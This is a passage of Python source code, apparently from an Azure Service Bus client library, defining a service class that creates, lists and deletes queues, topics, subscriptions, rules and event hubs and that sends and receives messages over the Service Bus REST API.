_USER_AGENT_STRING,
)
from ._common_error import (
_dont_fail_not_exist,
_dont_fail_on_exist,
_validate_not_none,
)
from ._common_models import (
_unicode_type,
)
from ._common_conversion import (
_encode_base64,
_int_or_none,
_sign_string,
_str,
)
from ._common_serialization import (
_ETreeXmlToObject,
_get_request_body,
url_quote,
url_unquote,
)
from ._http import (
HTTPError,
HTTPRequest,
)
from ._http.httpclient import _HTTPClient
from ._serialization import (
_convert_event_hub_to_xml,
_convert_topic_to_xml,
_convert_response_to_topic,
_convert_queue_to_xml,
_convert_response_to_queue,
_convert_subscription_to_xml,
_convert_response_to_subscription,
_convert_rule_to_xml,
_convert_response_to_rule,
_convert_response_to_event_hub,
_convert_etree_element_to_queue,
_convert_etree_element_to_topic,
_convert_etree_element_to_subscription,
_convert_etree_element_to_rule,
_create_message,
_service_bus_error_handler,
)
class ServiceBusService(object):
def __init__(self, service_namespace=None, account_key=None, issuer=None,
x_ms_version='2011-06-01', host_base=SERVICE_BUS_HOST_BASE,
shared_access_key_name=None, shared_access_key_value=None,
authentication=None, timeout=DEFAULT_HTTP_TIMEOUT,
request_session=None):
'''
Initializes the service bus service for a namespace with the specified
authentication settings (SAS or ACS).
service_namespace:
Service bus namespace, required for all operations. If None,
the value is set to the AZURE_SERVICEBUS_NAMESPACE env variable.
account_key:
ACS authentication account key. If None, the value is set to the
AZURE_SERVICEBUS_ACCESS_KEY env variable.
Note that if both SAS and ACS settings are specified, SAS is used.
issuer:
ACS authentication issuer. If None, the value is set to the
AZURE_SERVICEBUS_ISSUER env variable.
Note that if both SAS and ACS settings are specified, SAS is used.
x_ms_version:
Unused. Kept for backwards compatibility.
host_base:
Optional. Live host base url. Defaults to Azure url. Override this
for on-premise.
shared_access_key_name:
SAS authentication key name.
Note that if both SAS and ACS settings are specified, SAS is used.
shared_access_key_value:
SAS authentication key value.
Note that if both SAS and ACS settings are specified, SAS is used.
authentication:
Instance of authentication class. If this is specified, then
ACS and SAS parameters are ignored.
timeout:
Optional. Timeout for the http request, in seconds.
request_session:
Optional. Session object to use for http requests.
'''
self.requestid = None
self.service_namespace = service_namespace
self.host_base = host_base
if not self.service_namespace:
self.service_namespace = os.environ.get(AZURE_SERVICEBUS_NAMESPACE)
if not self.service_namespace:
raise ValueError('You need to provide servicebus namespace')
if authentication:
self.authentication = authentication
else:
if not account_key:
account_key = os.environ.get(AZURE_SERVICEBUS_ACCESS_KEY)
if not issuer:
issuer = os.environ.get(AZURE_SERVICEBUS_ISSUER)
if shared_access_key_name and shared_access_key_value:
self.authentication = ServiceBusSASAuthentication(
shared_access_key_name,
shared_access_key_value)
elif account_key and issuer:
self.authentication = ServiceBusWrapTokenAuthentication(
account_key,
issuer)
else:
raise ValueError(
'You need to provide servicebus access key and Issuer OR shared access key and value')
self._httpclient = _HTTPClient(
service_instance=self,
timeout=timeout,
request_session=request_session or requests.Session(),
user_agent=_USER_AGENT_STRING,
)
self._filter = self._httpclient.perform_request
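    # Illustrative construction sketch (not part of the original module); the
    # namespace and SAS credential values below are placeholder assumptions:
    #
    #     sbs = ServiceBusService(
    #         service_namespace='mynamespace',
    #         shared_access_key_name='RootManageSharedAccessKey',
    #         shared_access_key_value='<key-value>')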
@staticmethod
def format_dead_letter_queue_name(queue_name):
"""Get the dead letter name of this queue"""
return queue_name + '/$DeadLetterQueue'
@staticmethod
def format_dead_letter_subscription_name(subscription_name):
"""Get the dead letter name of this subscription"""
return subscription_name + '/$DeadLetterQueue'
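    # For example (illustrative, assuming an 'sbs' service instance), a queue
    # named 'orders' has the dead letter queue 'orders/$DeadLetterQueue',
    # which can be read like any other queue:
    #
    #     dlq = ServiceBusService.format_dead_letter_queue_name('orders')
    #     msg = sbs.receive_queue_message(dlq, peek_lock=False)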
# Backwards compatibility:
# account_key and issuer used to be stored on the service class, they are
# now stored on the authentication class.
@property
def account_key(self):
return self.authentication.account_key
@account_key.setter
def account_key(self, value):
self.authentication.account_key = value
@property
def issuer(self):
return self.authentication.issuer
@issuer.setter
def issuer(self, value):
self.authentication.issuer = value
def with_filter(self, filter):
'''
Returns a new service which will process requests with the specified
filter. Filtering operations can include logging, automatic retrying,
etc... The filter is a lambda which receives the HTTPRequest and
another lambda. The filter can perform any pre-processing on the
request, pass it off to the next lambda, and then perform any
post-processing on the response.
'''
res = ServiceBusService(
service_namespace=self.service_namespace,
authentication=self.authentication)
old_filter = self._filter
def new_filter(request):
return filter(request, old_filter)
res._filter = new_filter
return res
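    # Minimal logging-filter sketch (assumed example, not from the module);
    # 'sbs' is an existing ServiceBusService instance:
    #
    #     def log_filter(request, next_filter):
    #         print('servicebus request:', request.method, request.path)
    #         response = next_filter(request)
    #         print('servicebus response:', response.status)
    #         return response
    #
    #     logged_sbs = sbs.with_filter(log_filter)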
def set_proxy(self, host, port, user=None, password=None):
'''
Sets the proxy server host and port for the HTTP CONNECT Tunnelling.
host:
Address of the proxy. Ex: '192.168.0.100'
port:
Port of the proxy. Ex: 6000
user:
User for proxy authorization.
password:
Password for proxy authorization.
'''
self._httpclient.set_proxy(host, port, user, password)
@property
def timeout(self):
return self._httpclient.timeout
@timeout.setter
def timeout(self, value):
self._httpclient.timeout = value
def create_queue(self, queue_name, queue=None, fail_on_exist=False):
'''
Creates a new queue. Once created, this queue's resource manifest is
immutable.
queue_name:
Name of the queue to create.
queue:
Queue object to create.
fail_on_exist:
Specify whether to throw an exception when the queue exists.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.body = _get_request_body(_convert_queue_to_xml(queue))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
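    # Usage sketch (illustrative; the Queue model attribute is an assumption
    # based on this SDK's models):
    #
    #     queue = Queue(max_size_in_megabytes=5120)
    #     sbs.create_queue('taskqueue', queue)        # False if it already exists
    #     sbs.create_queue('taskqueue', queue, fail_on_exist=True)  # raises instead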
def delete_queue(self, queue_name, fail_not_exist=False):
'''
Deletes an existing queue. This operation will also remove all
associated state including messages in the queue.
queue_name:
Name of the queue to delete.
fail_not_exist:
Specify whether to throw an exception if the queue doesn't exist.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_queue(self, queue_name):
'''
Retrieves an existing queue.
queue_name:
Name of the queue.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_queue(response)
def list_queues(self):
'''
Enumerates the queues in the service namespace.
'''
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/$Resources/Queues'
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_queue)
def create_topic(self, topic_name, topic=None, fail_on_exist=False):
'''
        Creates a new topic. Once created, this topic's resource manifest is
immutable.
topic_name:
Name of the topic to create.
topic:
Topic object to create.
fail_on_exist:
Specify whether to throw an exception when the topic exists.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.body = _get_request_body(_convert_topic_to_xml(topic))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_topic(self, topic_name, fail_not_exist=False):
'''
Deletes an existing topic. This operation will also remove all
associated state including associated subscriptions.
topic_name:
Name of the topic to delete.
fail_not_exist:
            Specify whether to throw an exception when the topic doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_topic(self, topic_name):
'''
Retrieves the description for the specified topic.
topic_name:
Name of the topic.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_topic(response)
def list_topics(self):
'''
Retrieves the topics in the service namespace.
'''
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/$Resources/Topics'
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_topic)
def create_rule(self, topic_name, subscription_name, rule_name, rule=None,
fail_on_exist=False):
'''
Creates a new rule. Once created, this rule's resource manifest is
immutable.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule.
fail_on_exist:
Specify whether to throw an exception when the rule exists.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.body = _get_request_body(_convert_rule_to_xml(rule))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_rule(self, topic_name, subscription_name, rule_name,
fail_not_exist=False):
'''
Deletes an existing rule.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule to delete. DEFAULT_RULE_NAME=$Default.
Use DEFAULT_RULE_NAME to delete default rule for the subscription.
fail_not_exist:
            Specify whether to throw an exception when the rule doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_rule(self, topic_name, subscription_name, rule_name):
'''
Retrieves the description for the specified rule.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_rule(response)
def list_rules(self, topic_name, subscription_name):
'''
Retrieves the rules that exist under the specified subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + '/rules/'
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_rule)
def create_subscription(self, topic_name, subscription_name,
subscription=None, fail_on_exist=False):
'''
        Creates a new subscription. Once created, this subscription's resource
manifest is immutable.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
fail_on_exist:
            Specify whether to throw an exception when the subscription exists.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.body = _get_request_body(
_convert_subscription_to_xml(subscription))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_subscription(self, topic_name, subscription_name,
fail_not_exist=False):
'''
Deletes an existing subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription to delete.
fail_not_exist:
Specify whether to throw an exception when the subscription
doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_subscription(self, topic_name, subscription_name):
'''
Gets an existing subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_subscription(response)
def list_subscriptions(self, topic_name):
'''
Retrieves the subscriptions in the specified topic.
topic_name:
Name of the topic.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/'
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_subscription)
def send_topic_message(self, topic_name, message=None):
'''
        Enqueues a message into the specified topic. The total size of the
        messages that may be present in the topic is governed by the topic's
        maximum size (MaxTopicSizeInBytes). If this message causes the topic
        to exceed its quota, a quota exceeded error is returned and the
        message will be rejected.
topic_name:
Name of the topic.
message:
Message object containing message body and properties.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('message', message)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/messages'
request.headers = message.add_headers(request)
request.body = _get_request_body(message.body)
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def send_topic_message_batch(self, topic_name, messages=None):
'''
        Sends a batch of messages into the specified topic. The total size of
        the messages that may be present in the topic is governed by the
        topic's maximum size (MaxTopicSizeInMegaBytes). If the batch causes
        the topic to exceed its quota, a quota exceeded error is returned and
        the messages will be rejected.
topic_name:
Name of the topic.
messages:
List of message objects containing message body and properties.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('messages', messages)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/messages'
request.headers.append(('Content-Type', 'application/vnd.microsoft.servicebus.json'))
request.body = _get_request_body(json.dumps([m.as_batch_body() for m in messages]))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
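    # Batch-send sketch (illustrative; assumes the SDK's Message model):
    #
    #     messages = [Message(b'first'), Message(b'second')]
    #     sbs.send_topic_message_batch('mytopic', messages)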
def peek_lock_subscription_message(self, topic_name, subscription_name,
timeout='60'):
'''
        This operation is used to atomically retrieve and lock a message for
        processing. The message is guaranteed not to be delivered to other
        receivers (on the same subscription only) during the lock duration
        period specified in the subscription description. Once the lock
        expires, the message will be available to other receivers. In order to
        complete processing of the message, the receiver should issue a delete
        command with the lock ID received from this operation. To abandon
        processing of the message and unlock it for other receivers, an Unlock
        Message command should be issued, or the lock duration period can
        expire.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + '/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
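    # Peek-lock workflow sketch (illustrative; 'process' is hypothetical, and
    # delete()/unlock() are the received Message object's completion helpers):
    #
    #     msg = sbs.peek_lock_subscription_message('mytopic', 'mysub')
    #     try:
    #         process(msg.body)
    #         msg.delete()    # complete the message
    #     except Exception:
    #         msg.unlock()    # abandon it for redelivery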
def unlock_subscription_message(self, topic_name, subscription_name,
sequence_number, lock_token):
'''
Unlock a message for processing by other receivers on a given
subscription. This operation deletes the lock object, causing the
message to be unlocked. A message must have first been locked by a
receiver before this operation is called.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
sequence_number:
The sequence number of the message to be unlocked as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
                       '/subscriptions/' + _str(subscription_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def renew_lock_subscription_message(self, topic_name, subscription_name,
sequence_number, lock_token):
'''
Renew the lock on an already locked message on a given
subscription. A message must have first been locked by a
receiver before this operation is called.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
sequence_number:
The sequence number of the message to be unlocked as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
                       '/subscriptions/' + _str(subscription_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def read_delete_subscription_message(self, topic_name, subscription_name,
timeout='60'):
'''
Read and delete a message from a subscription as an atomic operation.
This operation should be used when a best-effort guarantee is
sufficient for an application; that is, using this operation it is
possible for messages to be lost if processing fails.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
'/subscriptions/' + _str(subscription_name) + \
'/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def delete_subscription_message(self, topic_name, subscription_name,
sequence_number, lock_token):
'''
Completes processing on a locked message and delete it from the
subscription. This operation should only be called after processing a
previously locked message is successful to maintain At-Least-Once
delivery assurances.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
sequence_number:
The sequence number of the message to be deleted as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
'/subscriptions/' + _str(subscription_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def send_queue_message(self, queue_name, message=None):
'''
        Sends a message into the specified queue. The total size of the
        messages that may be present in the queue is governed by the queue's
        maximum size setting. If this message causes the queue to exceed its
        quota, a quota exceeded error is returned and the message will be
        rejected.
queue_name:
Name of the queue.
message:
Message object containing message body and properties.
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('message', message)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + '/messages'
request.headers = message.add_headers(request)
request.body = _get_request_body(message.body)
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def send_queue_message_batch(self, queue_name, messages=None):
'''
        Sends a batch of messages into the specified queue. The total size of
        the messages that may be present in the queue is governed by the
        queue's maximum size setting. If the batch causes the queue to exceed
        its quota, a quota exceeded error is returned and the messages will be
        rejected.
queue_name:
Name of the queue.
messages:
List of message objects containing message body and properties.
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('messages', messages)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + '/messages'
request.headers.append(('Content-Type', 'application/vnd.microsoft.servicebus.json'))
request.body = _get_request_body(json.dumps([m.as_batch_body() for m in messages]))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def peek_lock_queue_message(self, queue_name, timeout='60'):
'''
        Atomically retrieves and locks a message from a queue for processing.
        The message is guaranteed not to be delivered to other receivers
        during the lock duration period specified in the queue description.
        Once the lock expires, the message will be
available to other receivers. In order to complete processing of the
message, the receiver should issue a delete command with the lock ID
received from this operation. To abandon processing of the message and
unlock it for other receivers, an Unlock Message command should be
issued, or the lock duration period can expire.
queue_name:
Name of the queue.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + '/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
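    # Queue peek-lock sketch (illustrative; assumes the received message
    # carries a populated broker_properties dict):
    #
    #     msg = sbs.peek_lock_queue_message('taskqueue')
    #     seq = msg.broker_properties['SequenceNumber']
    #     token = msg.broker_properties['LockToken']
    #     sbs.renew_lock_queue_message('taskqueue', seq, token)   # keep the lock
    #     sbs.delete_queue_message('taskqueue', seq, token)       # then complete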
def unlock_queue_message(self, queue_name, sequence_number, lock_token):
'''
Unlocks a message for processing by other receivers on a given
queue. This operation deletes the lock object, causing the
message to be unlocked. A message must have first been locked by a
receiver before this operation is called.
queue_name:
Name of the queue.
sequence_number:
The sequence number of the message to be unlocked as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def renew_lock_queue_message(self, queue_name, sequence_number, lock_token):
'''
Renew lock on an already locked message on a given
queue. A message must have first been locked by a
receiver before this operation is called.
queue_name:
Name of the queue.
sequence_number:
The sequence number of the message to be unlocked as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def read_delete_queue_message(self, queue_name, timeout='60'):
'''
Reads and deletes a message from a queue as an atomic operation. This
operation should be used when a best-effort guarantee is sufficient
for an application; that is, using this operation it is possible for
messages to be lost if processing fails.
queue_name:
Name of the queue.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + '/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def delete_queue_message(self, queue_name, sequence_number, lock_token):
'''
Completes processing on a locked message and delete it from the queue.
This operation should only be called after processing a previously
locked message is successful to maintain At-Least-Once delivery
assurances.
queue_name:
Name of the queue.
sequence_number:
The sequence number of the message to be deleted as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def receive_queue_message(self, queue_name, peek_lock=True, timeout=60):
'''
Receive a message from a queue for processing.
queue_name:
Name of the queue.
peek_lock:
Optional. True to retrieve and lock the message. False to read and
delete the message. Default is True (lock).
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
if peek_lock:
return self.peek_lock_queue_message(queue_name, timeout)
else:
return self.read_delete_queue_message(queue_name, timeout)
def receive_subscription_message(self, topic_name, subscription_name,
peek_lock=True, timeout=60):
'''
Receive a message from a subscription for processing.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
peek_lock:
Optional. True to retrieve and lock the message. False to read and
delete the message. Default is True (lock).
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
if peek_lock:
return self.peek_lock_subscription_message(topic_name,
subscription_name,
timeout)
else:
return self.read_delete_subscription_message(topic_name,
subscription_name,
timeout)
def create_event_hub(self, hub_name, hub=None, fail_on_exist=False):
'''
Creates a new Event Hub.
hub_name:
Name of event hub.
hub:
Optional. Event hub properties. Instance of EventHub class.
hub.message_retention_in_days:
Number of days to retain the events for this Event Hub.
hub.status: Status of the Event Hub (enabled or disabled).
hub.user_metadata: User metadata.
hub.partition_count: Number of shards on the Event Hub.
fail_on_exist:
Specify whether to throw an exception when the event hub exists.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + '?api-version=2014-01'
request.body = _get_request_body(_convert_event_hub_to_xml(hub))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def update_event_hub(self, hub_name, hub=None):
'''
Updates an Event Hub.
hub_name:
Name of event hub.
hub:
Optional. Event hub properties. Instance of EventHub class.
hub.message_retention_in_days:
Number of days to retain the events for this Event Hub.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + '?api-version=2014-01'
request.body = _get_request_body(_convert_event_hub_to_xml(hub))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers.append(('If-Match', '*'))
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_event_hub(response)
def delete_event_hub(self, hub_name, fail_not_exist=False):
'''
Deletes an Event Hub. This operation will also remove all associated
state.
hub_name:
Name of the event hub to delete.
fail_not_exist:
Specify whether to throw an exception if the event hub doesn't exist.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + '?api-version=2014-01'
request.path, request.query = self._httpclient._update_request_uri_query(request)
